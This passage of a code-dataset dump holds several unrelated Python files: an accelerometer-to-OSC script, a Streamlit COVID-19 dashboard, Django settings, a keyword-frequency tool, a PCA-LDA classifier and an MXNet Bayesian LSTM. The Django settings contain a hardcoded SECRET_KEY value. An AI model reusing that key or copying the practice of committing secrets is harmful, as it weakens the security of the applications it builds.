correcta.')\r\n","repo_name":"campa79/Python","sub_path":"final_wc3_OK_Extras.py","file_name":"final_wc3_OK_Extras.py","file_ext":"py","file_size_in_byte":2586,"program_lang":"python","lang":"es","doc_type":"code","stars":2,"dataset":"github-code","pt":"48"} +{"seq_id":"34617075785","text":"import smbus\nimport time\nfrom time import sleep\nimport sys\n\n#libs for osc\nimport argparse\nfrom pythonosc import udp_client\n\nbus = smbus.SMBus(1)\n\nbus.write_byte_data(0x53, 0x2C, 0x0B)\nvalue = bus.read_byte_data(0x53, 0x31)\nvalue &= ~0x0F;\nvalue |= 0x0B; \nvalue |= 0x08;\nbus.write_byte_data(0x53, 0x31, value)\nbus.write_byte_data(0x53, 0x2D, 0x08)\n\n#osc sender args\nparser = argparse.ArgumentParser()\nparser.add_argument(\"--ip\", default=\"127.0.0.1\")\nparser.add_argument(\"--port\", type=int, default=5005)\nargs = parser.parse_args()\nclient = udp_client.SimpleUDPClient(args.ip, args.port)\n\n\ndef getAxes():\n bytes = bus.read_i2c_block_data(0x53, 0x32, 6)\n \n x = bytes[0] | (bytes[1] << 8)\n if(x & (1 << 16 - 1)):\n x = x - (1<<16)\n\n y = bytes[2] | (bytes[3] << 8)\n if(y & (1 << 16 - 1)):\n y = y - (1<<16)\n\n z = bytes[4] | (bytes[5] << 8)\n if(z & (1 << 16 - 1)):\n z = z - (1<<16)\n\n x = x * 0.004 \n y = y * 0.004\n z = z * 0.004\n\n x = x * 9.80665\n y = y * 9.80665\n z = z * 9.80665\n\n x = round(x, 4)\n y = round(y, 4)\n z = round(z, 4)\n\n #print(\" x = %.3f ms2\" %x)\n #print(\" y = %.3f ms2\" %y)\n #print(\" z = %.3f ms2\" %z)\n client.send_message(\"/a\", [x, y, z])\n\n\n \n return {\"x\": x, \"y\": y, \"z\": z}\n \ntry:\n while True: \n getAxes()\n #client.send_message(\"/accel\", [x, y, z])\n time.sleep(0.01)\nexcept KeyboardInterrupt:\n sys.exit()\n","repo_name":"markijzerman/zouthavenbrug","sub_path":"old/ADXL345.py","file_name":"ADXL345.py","file_ext":"py","file_size_in_byte":1447,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"702559228","text":"import pandas as pd\nimport streamlit as st\nimport numpy as np\nimport plotly.express as px\n\n\n# title of the webpage\nst.title('COVID-19 India Dashboard')\n\n# add side bar of the webpage\nst.sidebar.title('Data Visualizer')\nst.sidebar.markdown('Use the options in the sidebar to create 🖱️ custom Charts 📊 and Graphs 📉')\nst.markdown('This is a webapp to Visualize 📈 COVID-19 🦠 pandemic situation in India 🌏 ')\n\n\n@st.cache(persist=True)\ndef load_state_data():\n state_data = pd.read_csv('https://api.covid19india.org/csv/latest/state_wise.csv')\n state_data['Death Rate (%)'] = round(state_data['Deaths']/state_data['Confirmed'], 4)*100\n return state_data\nstate_data = load_state_data()\n\nst.button('Re-Run')\nif st.button == True:\n st.write('Refreshing Data')\n state_data = load_state_data()\ndef homepage():\n import datetime\n now = datetime.datetime.now()\n value = []\n key = ['Number of Days since 1st Infection 🗓️', 'Total Number of Confirmed Cases 🤒',\n 'Total Number of Recovered 😊', 'Total Number of Deaths 💀', 'Total Number of Active Cases ➕', 'Death Rate (%) ⚰️']\n start = 'Jan 31 2020'; start = pd.to_datetime(start); start = start.dayofyear\n today = pd.to_datetime(now).dayofyear\n value.append(today-start)\n value.append(state_data[(state_data['State'] == 'Total')]['Confirmed'][0])\n value.append(state_data[(state_data['State'] == 'Total')]['Recovered'][0])\n value.append(state_data[(state_data['State'] == 'Total')]['Deaths'][0])\n value.append(state_data[(state_data['State'] == 'Total')]['Active'][0])\n value.append(round(value[3]/value[1], 4)*100)\n return pd.DataFrame({'Text': key, 'Number': value})\nhomepage = homepage()\nst.write(homepage)\n\n\n# show main table with top 10 infected countries\n# add subheader for the side bar\nst.sidebar.subheader('Choose the type of Graph you want')\n\n# # add dropdown\nselect = st.sidebar.selectbox('Visualization type', ['Death Rate %', 'Top 10 Infected States'], key='1')\nif not st.sidebar.checkbox('Hide Graphs', True):\n if select == 'Death Rate %':\n st.markdown('### Bar Chart depicting Death Rate (%) of Indian states')\n state_data['Death Rate (%)'] = round(state_data['Deaths']/state_data['Confirmed'], 4)*100\n death_perc = state_data[['State', 'Death Rate (%)']].sort_values(by='Death Rate (%)', ascending=False)[:29]\n fig = px.bar(death_perc, x='State', y='Death Rate (%)', height=600, width=800)\n st.plotly_chart(fig)\n elif select == 'Top 10 Infected States':\n st.markdown('### Table depicting 10 States with maximum number of Confirmed Cases')\n top10 = state_data[['State', 'Confirmed', 'Recovered', 'Deaths', 'Active', 'Death Rate (%)']][1:11]\n st.write(top10)\n\n\n\n# input text box\nst.sidebar.subheader('State Data comparision')\nstate = st.sidebar.text_input('Enter upto five State codes seprated by comma')\nstate = state.split(', ')\nstate\nif not st.sidebar.checkbox('Hide Table', False):\n #st.markdown(f'Showing data for {state}')\n st_len = len(state)\n if st_len > 5:\n st.write('Please enter no more than 5 State codes at once')\n elif st_len == 5:\n st.write(state_data[(state_data['State_code'] == state[0]) | (state_data['State_code'] == state[1]) | (state_data['State_code'] == state[2]) | (state_data['State_code'] == state[3]) | (state_data['State_code'] == state[4])][['State', 'Confirmed', 'Recovered', 'Deaths', 'Active']].reset_index(drop=True))\n elif st_len == 4:\n st.write(state_data[(state_data['State_code'] == state[0]) | (state_data['State_code'] == state[1]) | (state_data['State_code'] == state[2]) | (state_data['State_code'] == state[3])][['State', 'Confirmed', 'Recovered', 'Deaths', 'Active']].reset_index(drop=True))\n elif st_len == 3:\n st.write(state_data[(state_data['State_code'] == state[0]) | (state_data['State_code'] == state[1]) | (state_data['State_code'] == state[2])][['State', 'Confirmed', 'Recovered', 'Deaths', 'Active']].reset_index(drop=True))\n elif st_len == 2:\n st.write(state_data[(state_data['State_code'] == state[0]) | (state_data['State_code'] == state[1])][['State', 'Confirmed', 'Recovered', 'Deaths', 'Active']].reset_index(drop=True))\n elif st_len == 1:\n st.write(state_data[(state_data['State_code'] == state[0])][['State', 'Confirmed', 'Recovered', 'Deaths', 'Active']].reset_index(drop=True))\n elif st_len == 0:\n st.write('Please enter State code to enable Graph')\n","repo_name":"farzandkhan-zz/COVID-19","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":4502,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"34648659077","text":"# -*- coding: utf-8 -*-\n# Django settings for LikedFeed project. LikedFeed live on http://emrah.webfactional.com\n\nDEBUG = False\nTEMPLATE_DEBUG = True\n\nADMINS = (\n # ('Emrah', 'emrah@alemgir.com'),\n)\n\nMANAGERS = ADMINS\n\nDATABASE_ENGINE = 'sqlite3' # 'postgresql_psycopg2', 'postgresql', 'mysql', 'sqlite3' or 'oracle'.\nDATABASE_NAME = 'likedfeed' # Or path to database file if using sqlite3.\nDATABASE_USER = '' # Not used with sqlite3.\nDATABASE_PASSWORD = '' # Not used with sqlite3.\nDATABASE_HOST = '' # Set to empty string for localhost. Not used with sqlite3.\nDATABASE_PORT = '' # Set to empty string for default. Not used with sqlite3.\n\n\nSITE_HOST = '127.0.0.1:8000'\nMAIL_HOST = ''\n\nEMAIL_PORT = ''\n\nEMAIL_HOST_USER = ''\n\nEMAIL_HOST_PASSWORD = ''\nEMAIL_USE_TLS = True \nEMAIL_BACKEND = 'django.core.mail.backends.dummy.EmailBackend'\n\n\n# Local time zone for this installation. Choices can be found here:\n# http://en.wikipedia.org/wiki/List_of_tz_zones_by_name\n# although not all choices may be available on all operating systems.\n# If running in a Windows environment this must be set to the same as your\n# system time zone.\nTIME_ZONE = 'Europe/Istanbul'\n\n# Language code for this installation. All choices can be found here:\n# http://www.i18nguy.com/unicode/language-identifiers.html\nLANGUAGE_CODE = 'tr'\n\nSITE_ID = 1\n\n# If you set this to False, Django will make some optimizations so as not\n# to load the internationalization machinery.\nUSE_I18N = True\n\n# Absolute path to the directory that holds media.\n# Example: \"/home/media/media.lawrence.com/\"\nMEDIA_ROOT = ''\n\n# URL that handles the media served from MEDIA_ROOT. Make sure to use a\n# trailing slash if there is a path component (optional in other cases).\n# Examples: \"http://media.lawrence.com\", \"http://example.com/media/\"\nMEDIA_URL = ''\n\n# URL prefix for admin media -- CSS, JavaScript and images. Make sure to use a\n# trailing slash.\n# Examples: \"http://foo.com/media/\", \"/media/\".\nADMIN_MEDIA_PREFIX = '/media/'\n\n# Make this unique, and don't share it with anybody.\nSECRET_KEY = 'vlc!z&07ct16k%i1mv!e3op)&nb=%o4m)%3^ar-32hph7115!j'\n\n# List of callables that know how to import templates from various sources.\nTEMPLATE_LOADERS = (\n 'django.template.loaders.filesystem.load_template_source',\n 'django.template.loaders.app_directories.load_template_source',\n# 'django.template.loaders.eggs.load_template_source',\n)\n\nMIDDLEWARE_CLASSES = (\n 'django.middleware.common.CommonMiddleware',\n 'django.contrib.csrf.middleware.CsrfMiddleware',\n 'django.contrib.sessions.middleware.SessionMiddleware',\n 'django.contrib.auth.middleware.AuthenticationMiddleware',\n)\n\nROOT_URLCONF = 'LikedFeed.urls'\n\nimport os.path\nTEMPLATE_DIRS = (\n os.path.join(os.path.dirname(__file__),'tema' ),\n )\n\n\nINSTALLED_APPS = (\n 'django.contrib.auth',\n 'django.contrib.contenttypes',\n 'django.contrib.sessions',\n 'django.contrib.sites',\n 'django.contrib.admin',\n 'django.contrib.comments',\n 'django.contrib.markup',\n 'LikedFeed.bookmarks',\n \n) \nimport django.contrib.auth\ndjango.contrib.auth.LOGIN_URL = '/login/'\n\nfrom django.conf.global_settings import TEMPLATE_CONTEXT_PROCESSORS\nTEMPLATE_CONTEXT_PROCESSORS += (\n 'django.core.context_processors.request',\n) \n","repo_name":"emrahtokalak/WebBased-Social-Bookmarking-Applications","sub_path":"settings.py","file_name":"settings.py","file_ext":"py","file_size_in_byte":3318,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"16932972890","text":"# !/usr/bin/python\n# -*- coding: utf-8 -*-\n# @time : 2020/10/25 11:07\n# @author : Mo\n# @function: rule-word-freq, 统计各类别独有词汇的词频等\n\n\n# 适配linux\nimport sys\nimport os\npath_root = os.path.abspath(os.path.join(os.path.dirname(__file__), \"../..\"))\nsys.path.append(path_root)\nprint(path_root)\n# macadam\nfrom utils.text_tools import jieba_cut, txtRead, txtWrite, load_json, save_json\nfrom conf.path_config import stop_words_path\nfrom collections import Counter, OrderedDict\nfrom tqdm import tqdm\nimport jieba\nimport json\nimport copy\n\n\n# 停用词列表,默认使用hanlp停用词表\nf_stop = open(stop_words_path, \"r\", encoding=\"utf-8\")\nstop_words = []\nfor stop_word in f_stop.readlines():\n stop_words.append(stop_word.strip())\n\n# stop_words = [\"\\t\"]\n\n\ndef is_total_number(text: str) -> bool:\n \"\"\"\n judge is total chinese or not, 判断是不是全是数字\n Args:\n text: str, eg. \"macadam, 碎石路\"\n Returns:\n bool, True or False\n \"\"\"\n for word in text:\n if word not in \"0123456789.%\":\n return False\n return True\n\n\ndef statistics_keyword_by_label(path, rate=1):\n \"\"\"\n judge is total chinese or not, 判断是不是全是数字\n Args:\n path: str, eg. \"train.json\"\n rate: float, eg. 0.75\n Returns:\n None\n \"\"\"\n datas = txtRead(path)\n\n lwd = {}\n for i in tqdm(range(len(datas)), desc=\"jieba cut and statistics: \"):\n # 从标准文档里边获取文本, 切词处理\n d = datas[i]\n d_json = json.loads(d)\n text = d_json.get(\"x\", {}).get(\"text\")\n label = d_json.get(\"y\")\n word_list = list(jieba.cut(text))\n # 去除 停用词、全数字、1个字\n word_list = [wl for wl in word_list if wl not in stop_words and not is_total_number(wl) and len(wl) >= 2]\n # 词频统计(类别内)\n word_freq_dict = dict(Counter(word_list))\n if label not in lwd:\n lwd[label] = word_freq_dict\n else:\n lwd[label].update(word_freq_dict)\n\n # 取范围, 排序\n lwd_keys = list(lwd.keys())\n lwd_soft = [sorted(lwd[l].items(), key=lambda x: x[1], reverse=True) for l in lwd_keys]\n lwd_soft_rate = [s[:int(len(s) * rate)] for s in lwd_soft]\n label_word_dict = {lwd_keys[i]: OrderedDict(lwd_soft_rate[i]) for i in range(len(lwd_keys))}\n print(\"cut ok!\")\n # 获取每个类独有的词汇\n label_keys = set(list(label_word_dict.keys()))\n label_words = {}\n for key in label_keys:\n key_dict = set(list(label_word_dict[key].keys()))\n keys_other = copy.deepcopy(label_keys)\n keys_other.discard(key)\n # 其他类别的所有词汇\n kos = set()\n for ko in keys_other:\n ko_dict = set(list(label_word_dict[ko].keys()))\n kos = kos | ko_dict\n\n # 获取独有的词汇\n key_public = kos & key_dict\n key_label = key_dict - key_public\n\n label_word_freq = {kl:label_word_dict[key][kl] for kl in key_label}\n label_words[key] = label_word_freq\n\n save_json(label_words, \"label_keyword_unique.json\")\n\n\nif __name__ == '__main__':\n path = \"ccks_news_2020.json\"\n statistics_keyword_by_label(path, rate=1)\n mm = 0\n\n","repo_name":"yongzhuo/nlp_xiaojiang","sub_path":"AugmentText/augment_keyword/statistics_keyword.py","file_name":"statistics_keyword.py","file_ext":"py","file_size_in_byte":3238,"program_lang":"python","lang":"en","doc_type":"code","stars":1494,"dataset":"github-code","pt":"48"} +{"seq_id":"37622386828","text":"from myzonecv.core import consts as C\n\nKEYPOINT_NAMES = C.COCO_KEYPOINT_NAMES\nKEYPOINT_INDEX2NAME = C.COCO_KEYPOINT_INDEX2NAME\nSKELETON = C.COCO_SKELETON\nKEYPOINT_FLIP_PAIRS = C.COCO_KEYPOINT_FLIP_PAIRS\nKEYPOINT_UPPER_BODY = C.COCO_KEYPOINT_UPPER_BODY\nKEYPOINT_LOWER_BODY = C.COCO_KEYPOINT_LOWER_BODY\nKEYPOINT_WEIGHTS = C.COCO_KEYPOINT_WEIGHTS\nKEYPOINT_SIGMAS = C.COCO_KEYPOINT_SIGMAS\nPERSON_CAT_ID = C.COCO_PERSON_CAT_ID\n\nEVAL_OKS_HARD_FACTORS = C.COCO_EVAL_OKS_HARD_FACTORS\n\nMAX_DETECTIONS_PER_IMG = C.MAX_DETECTIONS_PER_IMG\nEVAL_SCORE_THRES = C.EVAL_SCORE_THRES\nEVAL_RECALL_THRES = C.EVAL_RECALL_THRES\nEVAL_AREA_RANGES = C.EVAL_AREA_RANGES\nEVAL_AREA_LABELS = C.EVAL_AREA_LABELS\n\nBBOX_PADDING_RATIO = C.BBOX_PADDING_RATIO\nBBOX_SCALE_UNIT = C.BBOX_SCALE_UNIT\nBORDER_COLOR_VALUE = C.BORDER_COLOR_VALUE\n","repo_name":"netpaladinx/myzonelab","sub_path":"myzonecv/core/data/datasets/coco/coco_consts.py","file_name":"coco_consts.py","file_ext":"py","file_size_in_byte":802,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"19086893470","text":"from sklearn.discriminant_analysis import LinearDiscriminantAnalysis\nfrom sklearn.decomposition import PCA\nfrom sklearn.metrics import accuracy_score, confusion_matrix\nfrom sklearn.model_selection import train_test_split, LeaveOneOut\nimport seaborn as sn\nimport pandas as pd\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom utils import classifier_cross_validation, classifier_external_validation\n\nclass PCA_LDA():\n def __init__(self, dataset, number_of_components, cross_validation_type='loo', split_for_validation=None, data_validation=None, equal_probabilites=False, lda_random_state=123):\n self.dataset = dataset\n self.number_of_components = number_of_components\n self.split_for_validation = split_for_validation\n self.data_validation = data_validation\n self.equal_probabilites = equal_probabilites\n self.lda_random_state = lda_random_state\n self.metrics = {}\n self._cv = None\n\n if not isinstance(self.dataset, pd.DataFrame):\n raise ValueError('The dataset should be a pd.DataFrame.')\n\n if (self.data_validation is None) and (self.split_for_validation is None):\n raise ValueError('Should be defined the samples for validation or size of test size for split the dataset.')\n\n if type(number_of_components) not in [int]:\n raise ValueError('number_of_components should be a positive integer.')\n\n if (not self.split_for_validation is None) and (self.data_validation is None):\n if self.split_for_validation == 'all':\n self._xCal = self.dataset.iloc[:, 2:]\n self._yCal = self.dataset.iloc[:, 1]\n elif isinstance(self.split_for_validation, float):\n self._xCal, self._xVal, self._yCal, self._yVal = train_test_split(self.dataset.iloc[:, 2:], self.dataset.iloc[:, 1], test_size=split_for_validation, random_state=lda_random_state)\n else:\n raise ValueError(\"split_for_validation need be a float value between 0 and 1 for split dataset. Use 1 for calibrate with all samples of dataset.\")\n\n if not self.data_validation is None:\n if isinstance(self.data_validation, pd.DataFrame):\n self._xCal = self.dataset.iloc[:, 2:]\n self._yCal = self.dataset.iloc[:, 1]\n self._xVal = self.data_validation.iloc[:, 2:]\n self._yVal = self.data_validation.iloc[:, 1]\n else:\n raise ValueError(\"data_validation need be a pandas dataframe\")\n\n if self.equal_probabilites not in [True, False]:\n raise ValueError('equal_probabilites should be a boolean value')\n\n if (type(self.lda_random_state) not in [int]):\n raise ValueError('lda_random_state should be a integer')\n\n if isinstance(cross_validation_type, str):\n if cross_validation_type == \"loo\":\n self._cv = LeaveOneOut()\n elif (type(cross_validation_type) in [int]) and (cross_validation_type > 0):\n self._cv = cross_validation_type\n else:\n raise ValueError(\"The cross_validation_type should be a positive integer for k-fold method ou 'loo' for leave one out cross validation.\")\n \n \n def calibrate(self):\n self._pca = PCA(n_components=self.number_of_components, tol=0.0000000001, random_state=self.lda_random_state, svd_solver=\"full\")\n \n self._xReduced = self._pca.fit_transform(self._xCal)\n \n if self.equal_probabilites == True:\n n_class = len(self._yCal.unique())\n priors = np.full((n_class, ), 1 / n_class)\n else:\n priors = self._yCal.value_counts(normalize=True)\n priors = np.array(priors.sort_index(axis=0))\n\n self._lda = LinearDiscriminantAnalysis(n_components=self.number_of_components, tol=1e-8, priors=priors)\n\n self._lda.fit(self._xReduced, self._yCal)\n\n self.predictions = self._lda.predict(self._xReduced)\n\n accuracy = accuracy_score(self._yCal, self.predictions)\n cm = confusion_matrix(self._yCal, self.predictions)\n cm = pd.DataFrame(cm)\n\n index_columns = self._yCal.value_counts().sort_index(axis=0).index\n cm.index = index_columns\n cm.columns = index_columns\n\n n_samples = self._yCal.shape[0]\n\n calibration_metrics = {'accuracy': accuracy, 'confusion_matrix': cm, 'n_samples': n_samples, 'n_components': self.number_of_components, 'priors': priors}\n\n self.metrics['calibration'] = calibration_metrics\n \n def cross_validate(self):\n \n accuracy, cm, predicted_values = classifier_cross_validation(self._lda, self._xReduced, self._yCal, cv=self._cv)\n\n method = 'LOO'\n if isinstance(self._cv, int):\n method = \"{}-fold\".format(self._cv)\n\n cross_validation_metrics = {'accuracy': accuracy, 'confusion_matrix': cm, 'method': method, 'predicted_values': predicted_values}\n\n self.metrics['cross_validation'] = cross_validation_metrics\n \n\n def validate(self):\n\n self._pca_val = PCA(n_components=self.number_of_components, tol=0.0000000001, random_state=self.lda_random_state, svd_solver=\"full\")\n\n self.xValReduced = self._pca_val.fit_transform(self._xVal)\n\n accuracy, cm, predicted_values = classifier_external_validation(self._lda, self.xValReduced, self._yVal)\n\n nsamples = self._xVal.shape[0]\n validation = {'accuracy': accuracy, 'confusion_matrix': cm, 'n_samples': nsamples, 'predicted_values': predicted_values}\n\n self.metrics['validation'] = validation\n \n def plot_confusion_matrix(self, cm, title='Confusion Matrix', cbar=True):\n sn.heatmap(cm, annot=True, cmap='Greys', linewidths=0.7, linecolor='black', cbar=cbar, square=True, fmt='g')\n plt.title(title, pad=20.0)\n plt.ylabel('Reference')\n plt.xlabel('Predicted')\n plt.tight_layout(pad=1.0)\n return plt\n \n\n def create_model(self):\n \n self.calibrate()\n self.cross_validate()\n self.validate()","repo_name":"dijsilva/spectroscopy-analysis-tool","sub_path":"algorithms/classification/pca_lda.py","file_name":"pca_lda.py","file_ext":"py","file_size_in_byte":6097,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"48"} +{"seq_id":"31295224441","text":"import math\nimport os\nimport time\nimport numpy as np\nimport mxnet as mx\nfrom mxnet import gluon, autograd\nfrom mxnet.gluon import nn, rnn\n\ncontext = mx.gpu(0)\nargs_data = '../data/nlp/ptb.'\nargs_model = 'lstm'\nargs_emsize = 100\nargs_nhid = 100\nargs_nlayers = 2\nargs_lr = 10.0\nargs_clip = 0.2\nargs_epochs = 2\nargs_batch_size = 32\nargs_bptt = 5\nargs_dropout = 0.2\nargs_tied = True\nargs_cuda = 'store_true'\nargs_log_interval = 500\nargs_save = 'model.param'\n\nclass Dictionary(object):\n def __init__(self):\n self.word2idx = {}\n self.idx2word = []\n\n def add_word(self, word):\n if word not in self.word2idx:\n self.idx2word.append(word)\n self.word2idx[word] = len(self.idx2word) - 1\n return self.word2idx[word]\n\n def __len__(self):\n return len(self.idx2word)\nclass Corpus(object):\n def __init__(self, path):\n self.dictionary = Dictionary()\n self.train = self.tokenize(path + 'train.txt')\n self.valid = self.tokenize(path + 'valid.txt')\n self.test = self.tokenize(path + 'test.txt')\n\n def tokenize(self, path):\n \"\"\"Tokenizes a text file.\"\"\"\n assert os.path.exists(path)\n # Add words to the dictionary\n with open(path, 'r') as f:\n tokens = 0\n for line in f:\n words = line.split() + ['']\n tokens += len(words)\n for word in words:\n self.dictionary.add_word(word)\n\n # Tokenize file content\n with open(path, 'r') as f:\n ids = np.zeros((tokens,), dtype='int32')\n token = 0\n for line in f:\n words = line.split() + ['']\n for word in words:\n ids[token] = self.dictionary.word2idx[word]\n token += 1\n return mx.nd.array(ids, dtype='int32')\ndef batchify(data, batch_size):\n \"\"\"Reshape data into (num_example, batch_size)\"\"\"\n nbatch = data.shape[0] // batch_size\n data = data[:nbatch * batch_size]\n data = data.reshape((batch_size, nbatch)).T\n return data\ndef get_batch(source, i):\n seq_len = min(args_bptt, source.shape[0] - 1 - i)\n data = source[i : i + seq_len]\n target = source[i + 1 : i + 1 + seq_len]\n return data, target.reshape((-1,))\n\ncorpus = Corpus(args_data)\nntokens = len(corpus.dictionary)\ntrain_data = batchify(corpus.train, args_batch_size).as_in_context(context)\nval_data = batchify(corpus.valid, args_batch_size).as_in_context(context)\ntest_data = batchify(corpus.test, args_batch_size).as_in_context(context)\nnum_batches = int(np.ceil( (train_data.shape[0] - 1)/args_bptt) )\n\nclass RNNModel(gluon.Block):\n \"\"\"A model with an encoder, recurrent layer, and a decoder.\"\"\"\n def __init__(self, mode, vocab_size, num_embed, num_hidden,\n num_layers, dropout=0.5, tie_weights=False, **kwargs):\n super(RNNModel, self).__init__(**kwargs)\n with self.name_scope():\n self.drop = nn.Dropout(dropout)\n self.encoder = nn.Embedding(vocab_size, num_embed,\n weight_initializer = mx.init.Uniform(0.1))\n if mode == 'rnn_relu':\n self.rnn = rnn.RNN(num_hidden, num_layers, activation='relu',\n dropout=dropout, input_size=num_embed)\n elif mode == 'rnn_tanh':\n self.rnn = rnn.RNN(num_hidden, num_layers, dropout=dropout,\n input_size=num_embed)\n elif mode == 'lstm':\n self.rnn = rnn.LSTM(num_hidden, num_layers, dropout=dropout,\n input_size=num_embed)\n elif mode == 'gru':\n self.rnn = rnn.GRU(num_hidden, num_layers, dropout=dropout,\n input_size=num_embed)\n else:\n raise ValueError(\"Invalid mode %s. Options are rnn_relu, \"\n \"rnn_tanh, lstm, and gru\"%mode)\n if tie_weights:\n self.decoder = nn.Dense(vocab_size, in_units = num_hidden,\n params = self.encoder.params)\n else:\n self.decoder = nn.Dense(vocab_size, in_units = num_hidden)\n self.num_hidden = num_hidden\n def forward(self, inputs, hidden):\n emb = self.drop(self.encoder(inputs))\n output, hidden = self.rnn(emb, hidden)\n output = self.drop(output)\n decoded = self.decoder(output.reshape((-1, self.num_hidden)))\n return decoded, hidden\n def begin_state(self, *args, **kwargs):\n return self.rnn.begin_state(*args, **kwargs)\n def set_params_to(self, new_values):\n for model_param, new_value in zip(self.collect_params().values(), new_values):\n model_param_ctx = model_param.list_ctx()[0]\n model_param._data[ model_param_ctx ] = new_value\n return\ndef detach(hidden):\n if isinstance(hidden, (tuple, list)):\n hidden = [i.detach() for i in hidden]\n else:\n hidden = hidden.detach()\n return hidden\n\nbaseline_model = RNNModel(args_model, ntokens, args_emsize, args_nhid, args_nlayers, args_dropout, args_tied)\nbaseline_model.collect_params().initialize(mx.init.Xavier(), ctx=context)\ntrainer = gluon.Trainer(\n baseline_model.collect_params(), 'sgd',\n {'learning_rate': args_lr, 'momentum': 0, 'wd': 0})\nsmce_loss = gluon.loss.SoftmaxCrossEntropyLoss() \n\ndef train_baseline(model):\n global args_lr\n best_val = float(\"Inf\")\n for epoch in range(args_epochs):\n total_L = 0.0\n start_time = time.time()\n hidden = model.begin_state(func = mx.nd.zeros, batch_size = args_batch_size, ctx = context)\n for ibatch, i in enumerate(range(0, train_data.shape[0] - 1, args_bptt)):\n data, target = get_batch(train_data, i)\n hidden = detach(hidden)\n with autograd.record():\n output, hidden = model(data, hidden)\n L = smce_loss(output, target)\n L.backward()\n grads = [i.grad(context) for i in model.collect_params().values()]\n # Here gradient is for the whole batch.\n # So we multiply max_norm by batch_size and bptt size to balance it.\n gluon.utils.clip_global_norm(grads, args_clip * args_bptt * args_batch_size)\n trainer.step(args_batch_size * args_bptt)\n total_L += mx.nd.sum(L).asscalar()\n if ibatch % args_log_interval == 0 and ibatch > 0:\n cur_L = total_L / args_bptt / args_batch_size / args_log_interval\n print('[Epoch %d Batch %d] loss %.2f, perplexity %.2f' % (\n epoch + 1, ibatch, cur_L, math.exp(cur_L)))\n total_L = 0.0\n val_L = evaluate(val_data, model)\n print('[Epoch %d] time cost %.2fs, validation loss %.2f, validation perplexity %.2f' % (epoch + 1, time.time() - start_time, val_L, math.exp(val_L)))\n if val_L < best_val:\n best_val = val_L\n test_L = evaluate(test_data, model)\n model.save_params(args_save)\n print('test loss %.2f, test perplexity %.2f' % (test_L, math.exp(test_L)))\n else:\n args_lr = args_lr * 0.25\n trainer._init_optimizer('sgd', {'learning_rate': args_lr, 'momentum': 0, 'wd': 0})\n model.load_params(args_save, context)\n return\ndef evaluate(data_source, model):\n total_L = 0.0\n ntotal = 0\n hidden = model.begin_state(func = mx.nd.zeros, batch_size = args_batch_size, ctx=context)\n for i in range(0, data_source.shape[0] - 1, args_bptt):\n data, target = get_batch(data_source, i)\n output, hidden = model(data, hidden)\n L = smce_loss(output, target)\n total_L += mx.nd.sum(L).asscalar()\n ntotal += L.size\n return total_L / ntotal\n\ntrain_baseline(baseline_model)\nbaseline_model.load_params(args_save, context)\ntest_L = evaluate(test_data, baseline_model)\nprint('Best test loss %.2f, test perplexity %.2f'%(test_L, math.exp(test_L)))\n\nclass ScaleMixturePrior(object):\n def __init__(self, alpha, sigma1, sigma2):\n self.alpha = mx.nd.array([alpha], ctx=context)\n self.one_minus_alpha = mx.nd.array([1 - alpha], ctx=context)\n self.zero = mx.nd.array([0.0], ctx=context)\n self.sigma1 = mx.nd.array([sigma1], ctx=context)\n self.sigma2 = mx.nd.array([sigma2], ctx=context)\n return\n def log_prob(self, model_params):\n total_log_prob = None\n for i, model_param in enumerate(model_params):\n p1 = gaussian_prob(model_param, self.zero, self.sigma1)\n p2 = gaussian_prob(model_param, self.zero, self.sigma2)\n log_prob = mx.nd.sum(mx.nd.log(self.alpha * p1 + self.one_minus_alpha * p2))\n if i == 0: total_log_prob = log_prob\n else: total_log_prob = total_log_prob + log_prob\n return total_log_prob\n# Define some auxiliary functions\ndef log_gaussian_prob(x, mu, sigma):\n return - mx.nd.log(sigma) - (x - mu) ** 2 / (2 * sigma ** 2)\ndef gaussian_prob(x, mu, sigma):\n scaling = 1.0 / mx.nd.sqrt(2.0 * np.pi * (sigma ** 2))\n bell = mx.nd.exp(-(x - mu)**2 / (2.0 * sigma ** 2))\n return scaling * bell\n\nclass VariationalPosterior(object):\n def __init__(self, model, var_mu_init_scale, var_sigma_init_scale):\n self.var_mus = []\n self.var_rhos = []\n self.raw_var_mus = []\n self.raw_var_rhos = []\n var_rho_init_scale = inv_softplus(var_sigma_init_scale)\n for i, model_param in enumerate(model.collect_params().values()):\n var_mu = gluon.Parameter('var_mu_{}'.format(i), shape=model_param.shape,\n init=mx.init.Normal(var_mu_init_scale))\n var_mu.initialize(ctx=context)\n self.var_mus.append(var_mu)\n self.raw_var_mus.append(var_mu.data(context))\n var_rho = gluon.Parameter(\n 'var_rho_{}'.format(i), shape=model_param.shape,\n init=mx.init.Constant(var_rho_init_scale))\n var_rho.initialize(ctx=context)\n self.var_rhos.append(var_rho)\n self.raw_var_rhos.append(var_rho.data(context))\n self.var_params = self.var_mus + self.var_rhos\n return\n def log_prob(self, model_params):\n log_probs = [\n mx.nd.sum(log_gaussian_prob(model_param, raw_var_mu, softplus(raw_var_rho)))\n for (model_param, raw_var_mu, raw_var_rho)\n in zip(model_params, self.raw_var_mus, self.raw_var_rhos)]\n total_log_prob = log_probs[0]\n for log_prob in log_probs[1:]:\n total_log_prob = total_log_prob + log_prob\n return total_log_prob\n def sample_model_params(self):\n model_params = []\n for raw_var_mu, raw_var_rho in zip(self.raw_var_mus, self.raw_var_rhos):\n epsilon = mx.nd.random_normal(shape=raw_var_mu.shape, loc=0., scale=1.0, ctx=context)\n var_sigma = softplus(raw_var_rho)\n model_param = raw_var_mu + var_sigma * epsilon\n model_params.append(model_param)\n return model_params\n def num_params(self):\n return sum([\n 2 * np.prod(param.shape)\n for param in self.var_mus])\n# Define some auxiliary functions\ndef softplus(x):\n return mx.nd.log(1. + mx.nd.exp(x))\ndef inv_softplus(x):\n if x <= 0: raise ValueError(\"x must be > 0: {}\".format(x))\n return np.log(np.exp(x) - 1.0)\n\nclass BBB_Loss(gluon.loss.Loss):\n def __init__(self, prior, var_posterior, log_likelihood, num_batches, weight=None, batch_axis=0, **kwargs):\n super(BBB_Loss, 